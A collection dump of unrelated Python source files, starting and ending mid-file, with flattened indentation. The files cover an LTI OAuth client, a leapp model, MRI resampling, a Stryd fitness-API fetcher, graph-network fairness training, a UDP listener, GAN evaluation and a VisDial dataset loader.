"LTI Provider may be disabled (to enable: LMS config > FEATURES > ENABLE_OAUTH2_PROVIDER: true"
)
raise HttpClientError(
"OAuth token request failure."
)
except RequestException:
log.exception('OAuth2 token request to the OpenEdx LTI Provider failed.')
raise HttpClientError(
"OAuth token request failure."
)
return access_token, expires_at
def get_course_blocks(self, course_id):
blocks = super().get_course_blocks(course_id)
filtered_blocks = ['sequential', 'course', 'chapter', 'vertical']
return [block for block in blocks if block['type'] not in filtered_blocks]
|
503650 | from leapp.models import Model, fields
from leapp.topics import SystemInfoTopic
class QuaggaToFrrFacts(Model):
"""
Model for quagga to frr actors.
A list of configuration files used by quagga. This list is used to add yes/no to
/etc/frr/daemons file. It indicates which daemons from frr should be run.
"""
topic = SystemInfoTopic
active_daemons = fields.List(fields.String())
enabled_daemons = fields.List(fields.String())
|
503663 | from glob import glob
import os
for file in glob("*/smri/warped_image/fwhm_6.0/*_wtsimt.nii.gz"):
if not os.path.exists(file.replace(".nii.gz", "_2mm.nii.gz")):
os.system("flirt -interp nearestneighbour -in %s -ref %s -applyisoxfm 2 -out %s"%(file, file, file.replace(".nii.gz", "_2mm.nii.gz")))
#os.remove(file) |
503702 | import requests
import datetime
import pandas as pd
from ..app import app
from ..utils import config
from .sqlalchemy_declarative import strydSummary
from ..api.database import engine
from sqlalchemy import func
def auth_stryd_session():
requestJSON = {"email": config.get('stryd', 'username'), "password": config.get('stryd', 'password')}
responseData = requests.post("https://www.stryd.com/b/email/signin", json=requestJSON)
if responseData.status_code != 200:
app.server.logger.debug("Stryd could not authenticate")
authenticated = False
raise Exception("failed password authentication")
else:
app.server.logger.debug("Stryd authenticated")
authenticated = True
tempData = responseData.json()
userID = tempData['id']
sessionID = tempData['token']
return sessionID
##############################
## get the list of workouts ##
##############################
def pull_stryd_data():
sessionID = auth_stryd_session()
today = datetime.datetime.now() + datetime.timedelta(
days=1) # Pass tomorrow's date to ensure no issues with timezones
start = today - datetime.timedelta(days=9999)
headers = {'Authorization': 'Bearer: {}'.format(sessionID)}
url = "https://www.stryd.com/b/api/v1/activities/calendar?srtDate={start}&endDate={today}&sortBy=StartDate".format(
start=start.strftime("%m-%d-%Y"), today=today.strftime("%m-%d-%Y"))
jsonData = {'srtDate': start.strftime("%m-%d-%Y"), 'endDate': today.strftime("%m-%d-%Y"), 'sortBy': 'StartDate'}
responseData = requests.get(url, headers=headers, params=jsonData)
df = pd.DataFrame(responseData.json()['activities']) # returns summary data for each workout
df.rename(columns={
"timestamp": "start_date_local",
"ftp": "stryd_ftp",
"stress": "rss"},
inplace=True)
df['start_date_local'] = df['start_date_local'].apply(datetime.datetime.fromtimestamp)
df.set_index(pd.to_datetime(df['start_date_local']), inplace=True)
# Specify which columns from stryd we want to bring over
df = df[['stryd_ftp',
'total_elevation_gain',
'total_elevation_loss',
'max_elevation',
'min_elevation',
'average_cadence',
'max_cadence',
'min_cadence',
'average_stride_length',
'max_stride_length',
'min_stride_length',
'average_ground_time',
'max_ground_time',
'min_ground_time',
'average_oscillation',
'max_oscillation',
'min_oscillation',
'average_leg_spring',
'rss',
'max_vertical_stiffness',
'stryds',
'elevation',
'temperature',
'humidity',
'windBearing',
'windSpeed',
'windGust',
'dewPoint']]
# Filter df for only new records not yet in DB
last_styrd_date = app.session.query(func.max(strydSummary.start_date_local))[0][0]
if last_styrd_date:
df = df[df.index > last_styrd_date]
if len(df) > 0:
app.server.logger.info('New stryd workouts found!')
# Insert into db
df.to_sql('stryd_summary', engine, if_exists='append', index=True)
app.session.commit()
app.session.remove()
return df
def get_training_distribution(race=1, gender=1, age=1):
sessionID = auth_stryd_session()
headers = {'Authorization': 'Bearer: {}'.format(sessionID)}
url = f"https://www.stryd.com/b/api/v1/users/runner-attribute?race={config.get('stryd', 'compare_against_race_event')}&gender={config.get('stryd', 'compare_against_gender')}&age={config.get('stryd', 'compare_against_age')}"
responseData = requests.get(url, headers=headers)
return responseData.json()
# '''{'attr': {'age': 28,
# 'endurance': 1835,
# 'fatigue_resistance': 1272,
# 'fitness': 3.0895057604261837,
# 'gender': 'male',
# 'muscle_power': 5.38494805940594,
# 'race': '5k',
# 'timestamp': 1594587608,
# 'user_key': '<KEY>'},
# 'fatigue_resistance_threshold': 1,
# 'percentile': {'endurance': 0.05242718446601946,
# 'fatigue_resistance': 0.4,
# 'fitness': 0.1475728155339806,
# 'median_endurance': 5361,
# 'median_fatigue_resistance': 1445,
# 'median_fitness': 3.9397466897464706,
# 'median_muscle_power': 6.089743589743589,
# 'muscle_power': 0.31456310679611654}}
# '''
|
503762 | import logging
from logging import config
import json
import random
from random import shuffle
import argparse
from pprint import pprint
from pathlib import Path
import sys
import os
import gc
import math
import ipdb
from tqdm import tqdm
import numpy as np
import pandas as pd
import adabound
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import OneHotEncoder
from sklearn import preprocessing
from sklearn.metrics import f1_score, accuracy_score, roc_auc_score
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Function
from torch.utils.data import Dataset, DataLoader
import networkx as nx
from torch_geometric.nn import GCNConv, ChebConv, SAGEConv, GINConv, GATConv
import itertools
tqdm.monitor_interval = 0
sys.path.append('../')
def to_device(tensor):
if tensor is not None: return tensor.to("cuda")
def make_dataset_1M(load_sidechannel=False):
r_cols = ['user_id', 'movie_id', 'rating', 'unix_timestamp']
ratings = pd.read_csv('../data/ml-1m/ratings.dat', sep='::', names=r_cols,
encoding='latin-1',engine='python')
shuffled_ratings = ratings.sample(frac=1).reset_index(drop=True)
train_cutoff_row = int(np.round(len(shuffled_ratings) * 0.9))
train_ratings = shuffled_ratings[:train_cutoff_row]
test_ratings = shuffled_ratings[train_cutoff_row:]
if load_sidechannel:
u_cols = ['user_id', 'sex', 'age', 'occupation', 'zip_code']
m_cols = ['movie_id', 'title', 'genre']
users = pd.read_csv('../data/ml-1m/users.dat', sep='::', names=u_cols,
encoding='latin-1', parse_dates=True,engine='python')
movies = pd.read_csv('../data/ml-1m/movies.dat', sep='::', names=m_cols,
encoding='latin-1', parse_dates=True,engine='python')
train_ratings.drop("unix_timestamp", inplace=True, axis=1)
train_ratings_matrix = train_ratings.pivot_table(index=['movie_id'], \
columns=['user_id'], values='rating').reset_index(drop=True)
test_ratings.drop("unix_timestamp", inplace=True, axis=1)
columnsTitles = ["user_id", "rating", "movie_id"]
train_ratings = train_ratings.reindex(columns=columnsTitles) - 1
test_ratings = test_ratings.reindex(columns=columnsTitles) - 1
users.user_id = users.user_id.astype(np.int64)
movies.movie_id = movies.movie_id.astype(np.int64)
users['user_id'] = users['user_id'] - 1
movies['movie_id'] = movies['movie_id'] - 1
if load_sidechannel:
return train_ratings, test_ratings, users, movies
else:
return train_ratings, test_ratings
def create_optimizer(params, mode, *args, **kwargs):
if mode == 'SGD':
opt = optim.SGD(params, *args, momentum=0., **kwargs)
elif mode.startswith('nesterov'):
momentum = float(mode[len('nesterov'):])
opt = optim.SGD(params, *args, momentum=momentum, nesterov=True, **kwargs)
elif mode.lower() == 'adam':
betas = kwargs.pop('betas', (.9, .999))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True,
weight_decay=1e-4, **kwargs)
elif mode.lower() == 'adam_hyp2':
betas = kwargs.pop('betas', (.5, .99))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True, **kwargs)
elif mode.lower() == 'adam_hyp3':
betas = kwargs.pop('betas', (0., .99))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True, **kwargs)
elif mode.lower() == 'adam_sparse':
betas = kwargs.pop('betas', (.9, .999))
opt = optim.SparseAdam(params, *args, weight_decay=1e-4, betas=betas)
elif mode.lower() == 'adam_sparse_hyp2':
betas = kwargs.pop('betas', (.5, .99))
opt = optim.SparseAdam(params, *args, betas=betas)
elif mode.lower() == 'adam_sparse_hyp3':
betas = kwargs.pop('betas', (.0, .99))
opt = optim.SparseAdam(params, *args, betas=betas)
elif mode.lower() == 'adabound':
opt = adabound.AdaBound(params, *args, final_lr=0.1)
else:
raise NotImplementedError()
return opt
ltensor = torch.LongTensor
def collate_fn(batch):
if isinstance(batch, np.ndarray) or (isinstance(batch, list) and isinstance(batch[0], np.ndarray)):
return ltensor(batch).contiguous()
else:
return torch.stack(batch).contiguous()
def get_logger(name, log_dir, config_dir):
"""
Creates a logger object
Parameters
----------
name: Name of the logger file
log_dir: Directory where logger file needs to be stored
config_dir: Directory from where log_config.json needs to be read
Returns
-------
A logger object which writes to both file and stdout
"""
config_dict = json.load(open( config_dir + 'log_config.json'))
config_dict['handlers']['file_handler']['filename'] = os.path.join(log_dir, name.replace('/', '-'))
logging.config.dictConfig(config_dict)
logger = logging.getLogger(name)
std_out_format = '%(asctime)s - %(message)s'
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logging.Formatter(std_out_format))
logger.addHandler(consoleHandler)
return logger
def node_cls_collate_fn(batch):
users = []
genders = []
occupations = []
ages = []
for [user, gender, occupation, age] in batch:
users.append(user)
genders.append(gender)
occupations.append(occupation)
ages.append(age)
users = ltensor(users)
genders = ltensor(genders)
occupations = ltensor(occupations)
ages = ltensor(ages)
return (users, genders, occupations, ages)
def train_node_cls(data_loader, args, model, optimizer):
model.train()
if args.show_tqdm:
data_itr = tqdm(enumerate(data_loader))
else:
data_itr = enumerate(data_loader)
for idx, (user, gender, occupation, age) in data_itr:
if args.use_cuda:
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
task_loss, preds = model((user, gender, occupation, age))
optimizer.zero_grad()
full_loss = task_loss
full_loss.backward()
optimizer.step()
def test_node_cls(test_fairness_set, args, model, mode='age'):
model.eval()
node_cls_test_loader = DataLoader(test_fairness_set, batch_size=4000, shuffle=False,
drop_last=False,
num_workers=1, pin_memory=True, collate_fn=node_cls_collate_fn)
for idx, (user, gender, occupation, age) in tqdm(enumerate(node_cls_test_loader)):
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
task_loss, [pred_age, pred_gender, pred_occupation] = model((user, gender, occupation, age))
pred_age = pred_age.max(1)[1]
pred_occupation = pred_occupation.max(1)[1]
pred_gender = (pred_gender > 0.5)
to_np = lambda x: x.detach().cpu().numpy()
pred_age, truth_age = to_np(pred_age), to_np(age)
pred_occupation, truth_occupation = to_np(pred_occupation), to_np(occupation)
pred_gender, truth_gender = to_np(pred_gender), to_np(gender)
macro_gender = f1_score(pred_gender, truth_gender, average='macro') if mode =='gender' else 0
macro_age = f1_score(pred_age, truth_age, average='macro') if mode =='age' else 0
macro_occupation = f1_score(pred_occupation, truth_occupation, average='macro') if mode =='occupation' else 0
roc_auc = roc_auc_score(truth_gender, pred_gender)
if mode =='gender':
conf = confusion_matrix(truth_gender, pred_gender)
elif mode == 'age':
conf = confusion_matrix(truth_age, pred_age)
elif mode == 'occupation':
conf = confusion_matrix(truth_occupation, pred_occupation)
args.logger.info("Confusion Matrix\n"+str(conf))
log = 'Macro F1/AUC: Gender: {:.4f}/{:.4f} Age: {:.4f} Occupation: {:.4f}\n===================='
args.logger.info(log.format(macro_gender, roc_auc, macro_age, macro_occupation))
rms, test_loss = 0,0
return rms, test_loss
def train_gda(data_loader, adv_loader, args, model, optimizer_task, optimizer_adv, pretrain=False):
model.train()
adv_loader = itertools.cycle(adv_loader)
if args.show_tqdm:
data_itr = tqdm(enumerate(zip(data_loader, adv_loader)))
else:
data_itr = enumerate(zip(data_loader, adv_loader))
for idx, (p_batch ,(user, gender, occupation, age)) in data_itr:
if args.use_cuda:
p_batch = p_batch.cuda()
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
loss_task, preds_task = model(p_batch)
if True:
optimizer_task.zero_grad()
loss_task.backward(retain_graph=True)
optimizer_task.step()
optimizer_task.zero_grad()
if not(pretrain):
loss_adv, (age_pred, gender_pred, occupation_pred) = model.forward_attr((user, gender, occupation, age))
optimizer_adv.zero_grad()
loss_adv.backward(retain_graph=True)
optimizer_adv.step()
optimizer_adv.zero_grad()
def test_gda(dataset, args, model):
test_loader = DataLoader(dataset, batch_size=4000, num_workers=1, collate_fn=collate_fn)
cst_inds = np.arange(args.num_ent, dtype=np.int64)[:, None]
if args.show_tqdm:
data_itr = tqdm(enumerate(test_loader))
else:
data_itr = enumerate(test_loader)
(user, gender, occupation, age) = dataset.user_features
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
preds_list = []
rels_list = []
for idx, p_batch in data_itr:
p_batch = (p_batch).cuda()
lhs, rel, rhs = p_batch[:, 0], p_batch[:, 1], p_batch[:, 2]
loss_task, preds = model(p_batch)
loss_adv, (age_pred, gender_pred, occupation_pred) = model.forward_attr((user, gender, occupation, age))
rel += 1
preds_list.append(preds.squeeze())
rels_list.append(rel.float())
total_preds = torch.cat(preds_list)
total_rels = torch.cat(rels_list)
predictions = total_preds.round().detach().cpu().numpy()
rms = torch.sqrt(F.mse_loss(total_preds.squeeze(), total_rels.squeeze()))
args.logger.info("Adversarial Loss: {}".format(loss_adv.item()))
args.logger.info("Edge RMSE: {}".format(rms.item()))
return
def train_gcmc(data_loader, counter, args, modelD, optimizer):
if args.show_tqdm:
data_itr = tqdm(enumerate(data_loader))
else:
data_itr = enumerate(data_loader)
for idx, p_batch in data_itr:
if args.use_cuda:
p_batch = p_batch.cuda()
p_batch_var = (p_batch)
task_loss, preds = modelD(p_batch_var)
optimizer.zero_grad()
full_loss = task_loss
full_loss.backward(retain_graph=False)
optimizer.step()
def test_gcmc(dataset, args, modelD):
test_loader = DataLoader(dataset, batch_size=4000, num_workers=1, collate_fn=collate_fn)
cst_inds = np.arange(args.num_ent, dtype=np.int64)[:, None]
if args.show_tqdm:
data_itr = tqdm(enumerate(test_loader))
else:
data_itr = enumerate(test_loader)
preds_list = []
rels_list = []
test_loss_list = []
for idx, p_batch in data_itr:
p_batch_var = (p_batch).cuda()
lhs, rel, rhs = p_batch_var[:, 0], p_batch_var[:, 1], p_batch_var[:, 2]
test_loss, preds = modelD(p_batch_var)
rel += 1
preds_list.append(preds.squeeze())
rels_list.append(rel.float())
test_loss_list.append(test_loss)
total_preds = torch.cat(preds_list)
total_rels = torch.cat(rels_list)
test_loss = torch.mean(torch.stack(test_loss_list))
predictions = total_preds.round().detach().cpu().numpy()
args.logger.info("Confusion Matrix\n"+str(confusion_matrix(total_rels.detach().cpu().numpy(), predictions)))
rms = torch.sqrt(F.mse_loss(total_preds.squeeze(), total_rels.squeeze()))
args.logger.info("Test RMSE: {}".format(rms.item()))
return rms, test_loss
|
503781 | from collections import namedtuple
import os, socket
Message = namedtuple('Message', 'data, response')
class Socket(object):
def __init__(self, host, port, dispatch, max_size = 1024):
self.host = host
self.port = port
self.max_size = max_size
self.dispatch = dispatch
def listen(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind((self.host, self.port))
while True:
data, address = self.sock.recvfrom(self.max_size)
self.dispatch(Message(data, lambda rdata: self.sock.sendto(rdata, address)))
|
503785 | import argparse
import pickle
import os
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.models import inception_v3, Inception3
import numpy as np
from tqdm import tqdm
from inception import InceptionV3
import sys
sys.path.append('../')
import common
sys.path.append('../retrieval_model')
import train_retrieval
sys.path.append('../cookgan')
import train_cookgan
from utils_cookgan import compute_txt_feat
from datasets_cookgan import FoodDataset
class Inception3Feature(Inception3):
def forward(self, x):
if x.shape[2] != 299 or x.shape[3] != 299:
x = F.interpolate(x, size=(299, 299), mode='bilinear', align_corners=True)
x = self.Conv2d_1a_3x3(x) # 299 x 299 x 3
x = self.Conv2d_2a_3x3(x) # 149 x 149 x 32
x = self.Conv2d_2b_3x3(x) # 147 x 147 x 32
x = F.max_pool2d(x, kernel_size=3, stride=2) # 147 x 147 x 64
x = self.Conv2d_3b_1x1(x) # 73 x 73 x 64
x = self.Conv2d_4a_3x3(x) # 73 x 73 x 80
x = F.max_pool2d(x, kernel_size=3, stride=2) # 71 x 71 x 192
x = self.Mixed_5b(x) # 35 x 35 x 192
x = self.Mixed_5c(x) # 35 x 35 x 256
x = self.Mixed_5d(x) # 35 x 35 x 288
x = self.Mixed_6a(x) # 35 x 35 x 288
x = self.Mixed_6b(x) # 17 x 17 x 768
x = self.Mixed_6c(x) # 17 x 17 x 768
x = self.Mixed_6d(x) # 17 x 17 x 768
x = self.Mixed_6e(x) # 17 x 17 x 768
x = self.Mixed_7a(x) # 17 x 17 x 768
x = self.Mixed_7b(x) # 8 x 8 x 1280
x = self.Mixed_7c(x) # 8 x 8 x 2048
x = F.avg_pool2d(x, kernel_size=8) # 8 x 8 x 2048
return x.view(x.shape[0], x.shape[1]) # 1 x 1 x 2048
def load_patched_inception_v3():
# inception = inception_v3(pretrained=True)
# inception_feat = Inception3Feature()
# inception_feat.load_state_dict(inception.state_dict())
inception_feat = InceptionV3([3], normalize_input=False)
return inception_feat
@torch.no_grad()
def extract_features(loader, inception, device):
pbar = tqdm(loader)
feature_list = []
for _, imgs, _, _ in pbar:
img = imgs[-1].to(device)
feature = inception(img)[0].view(img.shape[0], -1)
feature_list.append(feature.to('cpu'))
features = torch.cat(feature_list, 0)
return features
if __name__ == '__main__':
from utils_metrics import load_args
device = 'cuda' if torch.cuda.is_available() else 'cpu'
args = load_args()
_, _, txt_encoder, _, _ = train_retrieval.load_model(args.retrieval_model, device)
txt_encoder = txt_encoder.eval().to(device)
ckpt_args, _, netG, _, _, _ = train_cookgan.load_model(args.ckpt_path, device)
netG = netG.eval().to(device)
inception = load_patched_inception_v3()
inception = nn.DataParallel(inception).eval().to(device)
imsize = ckpt_args.base_size * (2 ** (ckpt_args.levels-1))
train_transform = transforms.Compose([
transforms.Resize(int(imsize * 76 / 64)),
transforms.CenterCrop(imsize)])
dataset = FoodDataset(
recipe_file=ckpt_args.recipe_file,
img_dir=ckpt_args.img_dir,
levels=ckpt_args.levels,
part='val',
food_type=ckpt_args.food_type,
base_size=ckpt_args.base_size,
transform=train_transform)
dataset_name = 'Recipe1M'
if ckpt_args.food_type:
dataset_name += f'_{ckpt_args.food_type}'
loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=4)
features = extract_features(loader, inception, device).numpy()
features = features[: args.n_sample]
print(f'extracted {features.shape[0]} features')
mean = np.mean(features, 0)
cov = np.cov(features, rowvar=False)
with open(f'inception_{dataset_name}.pkl', 'wb') as f:
pickle.dump({'mean': mean, 'cov': cov, 'dataset_name': dataset_name}, f) |
503842 | import torch
from torch.utils import data
import json
from pytorch_transformers.tokenization_bert import BertTokenizer
import numpy as np
import random
from utils.data_utils import list2tensorpad, encode_input, encode_image_input
from utils.image_features_reader import ImageFeaturesH5Reader
class VisdialDataset(data.Dataset):
def __init__(self, params):
self.numDataPoints = {}
num_samples_train = params['num_train_samples']
num_samples_val = params['num_val_samples']
self._image_features_reader = ImageFeaturesH5Reader(params['visdial_image_feats'])
with open(params['visdial_processed_train']) as f:
self.visdial_data_train = json.load(f)
if params['overfit']:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = 5
else:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = len(self.visdial_data_train['data']['dialogs'])
with open(params['visdial_processed_val']) as f:
self.visdial_data_val = json.load(f)
if params['overfit']:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = 5
else:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = len(self.visdial_data_val['data']['dialogs'])
with open(params['visdial_processed_test']) as f:
self.visdial_data_test = json.load(f)
self.numDataPoints['test'] = len(self.visdial_data_test['data']['dialogs'])
self.overfit = params['overfit']
with open(params['visdial_processed_val_dense_annotations']) as f:
self.visdial_data_val_dense = json.load(f)
self.num_options = params["num_options"]
self._split = 'train'
self.subsets = ['train','val','test']
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.tokenizer = tokenizer
# fetching token indicecs of [CLS] and [SEP]
tokens = ['[CLS]','[MASK]','[SEP]']
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
self.CLS = indexed_tokens[0]
self.MASK = indexed_tokens[1]
self.SEP = indexed_tokens[2]
self.params = params
self._max_region_num = 37
def __len__(self):
return self.numDataPoints[self._split]
@property
def split(self):
return self._split
@split.setter
def split(self, split):
assert split in self.subsets
self._split = split
def __getitem__(self, index):
def tokens2str(seq):
dialog_sequence = ''
for sentence in seq:
for word in sentence:
dialog_sequence += self.tokenizer._convert_id_to_token(word) + " "
dialog_sequence += ' </end> '
dialog_sequence = dialog_sequence.encode('utf8')
return dialog_sequence
def pruneRounds(context, num_rounds):
start_segment = 1
len_context = len(context)
cur_rounds = (len(context) // 2) + 1
l_index = 0
if cur_rounds > num_rounds:
# caption is not part of the final input
l_index = len_context - (2 * num_rounds)
start_segment = 0
return context[l_index:], start_segment
# Combining all the dialog rounds with the [SEP] and [CLS] token
MAX_SEQ_LEN = self.params['max_seq_len']
cur_data = None
if self._split == 'train':
cur_data = self.visdial_data_train['data']
elif self._split == 'val':
if self.overfit:
cur_data = self.visdial_data_train['data']
else:
cur_data = self.visdial_data_val['data']
else:
cur_data = self.visdial_data_test['data']
# number of options to score on
num_options = self.num_options
assert num_options > 1 and num_options <= 100
dialog = cur_data['dialogs'][index]
cur_questions = cur_data['questions']
cur_answers = cur_data['answers']
img_id = dialog['image_id']
if self._split == 'train':
utterances = []
utterances_random = []
tokenized_caption = self.tokenizer.encode(dialog['caption'])
utterances.append([tokenized_caption])
utterances_random.append([tokenized_caption])
tot_len = len(tokenized_caption) + 2 # add a 1 for the CLS token as well as the sep tokens which follows the caption
for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance = utterances[-1].copy()
cur_rnd_utterance_random = utterances[-1].copy()
tokenized_question = self.tokenizer.encode(cur_questions[utterance['question']])
tokenized_answer = self.tokenizer.encode(cur_answers[utterance['answer']])
cur_rnd_utterance.append(tokenized_question)
cur_rnd_utterance.append(tokenized_answer)
question_len = len(tokenized_question)
answer_len = len(tokenized_answer)
tot_len += question_len + 1 # the additional 1 is for the sep token
tot_len += answer_len + 1 # the additional 1 is for the sep token
cur_rnd_utterance_random.append(self.tokenizer.encode(cur_questions[utterance['question']]))
# randomly select one random utterance in that round
utterances.append(cur_rnd_utterance)
num_inds = len(utterance['answer_options'])
gt_option_ind = utterance['gt_index']
negative_samples = []
for _ in range(self.params["num_negative_samples"]):
all_inds = list(range(100))
all_inds.remove(gt_option_ind)
all_inds = all_inds[:(num_options-1)]
tokenized_random_utterance = None
option_ind = None
while len(all_inds):
option_ind = random.choice(all_inds)
tokenized_random_utterance = self.tokenizer.encode(cur_answers[utterance['answer_options'][option_ind]])
# the 1 here is for the sep token at the end of each utterance
if(MAX_SEQ_LEN >= (tot_len + len(tokenized_random_utterance) + 1)):
break
else:
all_inds.remove(option_ind)
if len(all_inds) == 0:
# all the options exceed the max len. Truncate the last utterance in this case.
tokenized_random_utterance = tokenized_random_utterance[:answer_len]
t = cur_rnd_utterance_random.copy()
t.append(tokenized_random_utterance)
negative_samples.append(t)
utterances_random.append(negative_samples)
# removing the caption in the beginning
utterances = utterances[1:]
utterances_random = utterances_random[1:]
assert len(utterances) == len(utterances_random) == 10
tokens_all_rnd = []
mask_all_rnd = []
segments_all_rnd = []
sep_indices_all_rnd = []
next_labels_all_rnd = []
hist_len_all_rnd = []
for j,context in enumerate(utterances):
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
next_labels_all = []
hist_len_all = []
context, start_segment = pruneRounds(context, self.params['visdial_tot_rounds'])
# print("{}: {}".format(j, tokens2str(context)))
tokens, segments, sep_indices, mask = encode_input(context, start_segment, self.CLS,
self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=self.params["mask_prob"])
tokens_all.append(tokens)
mask_all.append(mask)
sep_indices_all.append(sep_indices)
next_labels_all.append(torch.LongTensor([0]))
segments_all.append(segments)
hist_len_all.append(torch.LongTensor([len(context)-1]))
negative_samples = utterances_random[j]
for context_random in negative_samples:
context_random, start_segment = pruneRounds(context_random, self.params['visdial_tot_rounds'])
# print("{}: {}".format(j, tokens2str(context_random)))
tokens_random, segments_random, sep_indices_random, mask_random = encode_input(context_random, start_segment, self.CLS,
self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=self.params["mask_prob"])
tokens_all.append(tokens_random)
mask_all.append(mask_random)
sep_indices_all.append(sep_indices_random)
next_labels_all.append(torch.LongTensor([1]))
segments_all.append(segments_random)
hist_len_all.append(torch.LongTensor([len(context_random)-1]))
tokens_all_rnd.append(torch.cat(tokens_all,0).unsqueeze(0))
mask_all_rnd.append(torch.cat(mask_all,0).unsqueeze(0))
segments_all_rnd.append(torch.cat(segments_all, 0).unsqueeze(0))
sep_indices_all_rnd.append(torch.cat(sep_indices_all, 0).unsqueeze(0))
next_labels_all_rnd.append(torch.cat(next_labels_all, 0).unsqueeze(0))
hist_len_all_rnd.append(torch.cat(hist_len_all,0).unsqueeze(0))
tokens_all_rnd = torch.cat(tokens_all_rnd,0)
mask_all_rnd = torch.cat(mask_all_rnd,0)
segments_all_rnd = torch.cat(segments_all_rnd, 0)
sep_indices_all_rnd = torch.cat(sep_indices_all_rnd, 0)
next_labels_all_rnd = torch.cat(next_labels_all_rnd, 0)
hist_len_all_rnd = torch.cat(hist_len_all_rnd,0)
item = {}
item['tokens'] = tokens_all_rnd
item['segments'] = segments_all_rnd
item['sep_indices'] = sep_indices_all_rnd
item['mask'] = mask_all_rnd
item['next_sentence_labels'] = next_labels_all_rnd
item['hist_len'] = hist_len_all_rnd
# get image features
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, image_target, max_regions=self._max_region_num)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
return item
elif self.split == 'val':
# append all the 100 options and return all the 100 options concatenated with history
# that will lead to 1000 forward passes for a single image
gt_relevance = None
utterances = []
gt_option_inds = []
utterances.append([self.tokenizer.encode(dialog['caption'])])
options_all = []
for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance = utterances[-1].copy()
cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
# current round
gt_option_ind = utterance['gt_index']
option_inds = []
option_inds.append(gt_option_ind)
all_inds = list(range(100))
all_inds.remove(gt_option_ind)
all_inds = all_inds[:(num_options-1)]
option_inds.extend(all_inds)
gt_option_inds.append(0)
cur_rnd_options = []
answer_options = [utterance['answer_options'][k] for k in option_inds]
assert len(answer_options) == len(option_inds) == num_options
assert answer_options[0] == utterance['answer']
if rnd == self.visdial_data_val_dense[index]['round_id'] - 1:
gt_relevance = torch.Tensor(self.visdial_data_val_dense[index]['gt_relevance'])
# shuffle based on new indices
gt_relevance = gt_relevance[torch.LongTensor(option_inds)]
for answer_option in answer_options:
cur_rnd_cur_option = cur_rnd_utterance.copy()
cur_rnd_cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
cur_rnd_options.append(cur_rnd_cur_option)
cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
utterances.append(cur_rnd_utterance)
options_all.append(cur_rnd_options)
# encode the input and create batch x 10 x 100 * max_len arrays (batch x num_rounds x num_options)
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
hist_len_all = []
for rnd,cur_rnd_options in enumerate(options_all):
tokens_all_rnd = []
mask_all_rnd = []
segments_all_rnd = []
sep_indices_all_rnd = []
hist_len_all_rnd = []
for j,cur_rnd_option in enumerate(cur_rnd_options):
cur_rnd_option, start_segment = pruneRounds(cur_rnd_option, self.params['visdial_tot_rounds'])
tokens, segments, sep_indices, mask = encode_input(cur_rnd_option, start_segment,self.CLS,
self.SEP, self.MASK ,max_seq_len=MAX_SEQ_LEN, mask_prob=0)
tokens_all_rnd.append(tokens)
mask_all_rnd.append(mask)
segments_all_rnd.append(segments)
sep_indices_all_rnd.append(sep_indices)
hist_len_all_rnd.append(torch.LongTensor([len(cur_rnd_option)-1]))
tokens_all.append(torch.cat(tokens_all_rnd,0).unsqueeze(0))
mask_all.append(torch.cat(mask_all_rnd,0).unsqueeze(0))
segments_all.append(torch.cat(segments_all_rnd,0).unsqueeze(0))
sep_indices_all.append(torch.cat(sep_indices_all_rnd,0).unsqueeze(0))
hist_len_all.append(torch.cat(hist_len_all_rnd,0).unsqueeze(0))
tokens_all = torch.cat(tokens_all,0)
mask_all = torch.cat(mask_all,0)
segments_all = torch.cat(segments_all, 0)
sep_indices_all = torch.cat(sep_indices_all, 0)
hist_len_all = torch.cat(hist_len_all,0)
item = {}
item['tokens'] = tokens_all
item['segments'] = segments_all
item['sep_indices'] = sep_indices_all
item['mask'] = mask_all
item['hist_len'] = hist_len_all
item['gt_option_inds'] = torch.LongTensor(gt_option_inds)
# return dense annotation data as well
item['round_id'] = torch.LongTensor([self.visdial_data_val_dense[index]['round_id']])
item['gt_relevance'] = gt_relevance
# add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, \
image_target, max_regions=self._max_region_num, mask_prob=0)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
item['image_id'] = torch.LongTensor([img_id])
return item
else:
assert num_options == 100
cur_rnd_utterance = [self.tokenizer.encode(dialog['caption'])]
options_all = []
